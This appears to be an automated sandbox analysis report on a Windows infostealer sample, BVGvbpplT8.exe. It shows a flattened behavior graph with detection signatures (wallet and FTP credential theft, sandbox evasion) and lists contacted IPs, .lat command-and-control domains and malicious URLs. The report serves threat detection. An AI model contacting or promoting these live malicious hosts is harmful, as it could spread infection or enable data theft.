behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579779 Sample: BVGvbpplT8.exe Startdate: 23/12/2024 Architecture: WINDOWS Score: 100 22 sweepyribs.lat 2->22 24 sustainskelet.lat 2->24 26 11 other IPs or domains 2->26 36 Suricata IDS alerts for network traffic 2->36 38 Found malware configuration 2->38 40 Antivirus / Scanner detection for submitted sample 2->40 42 9 other signatures 2->42 7 BVGvbpplT8.exe 2 2->7         started        signatures3 process4 dnsIp5 28 185.215.113.16, 49794, 80 WHOLESALECONNECTIONSNL Portugal 7->28 30 lev-tolstoi.com 104.21.66.86, 443, 49721, 49730 CLOUDFLARENETUS United States 7->30 32 steamcommunity.com 104.102.49.254, 443, 49719 AKAMAI-ASUS United States 7->32 18 C:\Users\user\...\O215CKAM4VJZ3EV7.exe, PE32 7->18 dropped 20 C:\...\44WNAJWW05E0258PKFVID8DSXYO93MX.exe, PE32 7->20 dropped 44 Query firmware table information (likely to detect VMs) 7->44 46 Found many strings related to Crypto-Wallets (likely being stolen) 7->46 48 Tries to harvest and steal ftp login credentials 7->48 50 8 other signatures 7->50 12 44WNAJWW05E0258PKFVID8DSXYO93MX.exe 9 1 7->12         started        15 O215CKAM4VJZ3EV7.exe 13 7->15         started        file6 signatures7 process8 dnsIp9 52 Detected unpacking (changes PE section rights) 12->52 54 Machine Learning detection for dropped file 12->54 56 Modifies windows update settings 12->56 64 7 other signatures 12->64 34 185.215.113.206, 49833, 80 WHOLESALECONNECTIONSNL Portugal 15->34 58 Antivirus detection for dropped file 15->58 60 Tries to detect sandboxes and other dynamic analysis tools (window names) 15->60 62 Tries to evade debugger and weak emulator (self modifying code) 15->62 signatures10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.21.66.86
 lev-tolstoi.com United States
13335 CLOUDFLARENETUS false
104.102.49.254
 steamcommunity.com United States
16625 AKAMAI-ASUS false
185.215.113.206
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
185.215.113.16
 unknown Portugal
206894 WHOLESALECONNECTIONSNL false

Contacted Domains

Name IP Active
steamcommunity.com 104.102.49.254 true
lev-tolstoi.com 104.21.66.86 true
ax-0001.ax-msedge.net 150.171.28.10 true
fp2e7a.wpc.phicdn.net 192.229.221.95 true
sustainskelet.lat unknown unknown
crosshuaht.lat unknown unknown
rapeflowwj.lat unknown unknown
grannyejh.lat unknown unknown
aspecteirs.lat unknown unknown
sweepyribs.lat unknown unknown
discokeyus.lat unknown unknown
energyaffai.lat unknown unknown
necklacebudi.lat unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.215.113.206/ false
    		high
    aspecteirs.lat false
      		high
      sweepyribs.lat false
        		high
        sustainskelet.lat false
          		high
          rapeflowwj.lat false
            		high
            https://steamcommunity.com/profiles/76561199724331900 false
              		high
              energyaffai.lat false
                		high
                https://lev-tolstoi.com/api false
                  		high
                  grannyejh.lat false
                    		high
                    necklacebudi.lat false
                      		high
                      crosshuaht.lat false
                        		high
                        http://185.215.113.206/c4becf79229cb002.php false
                          		high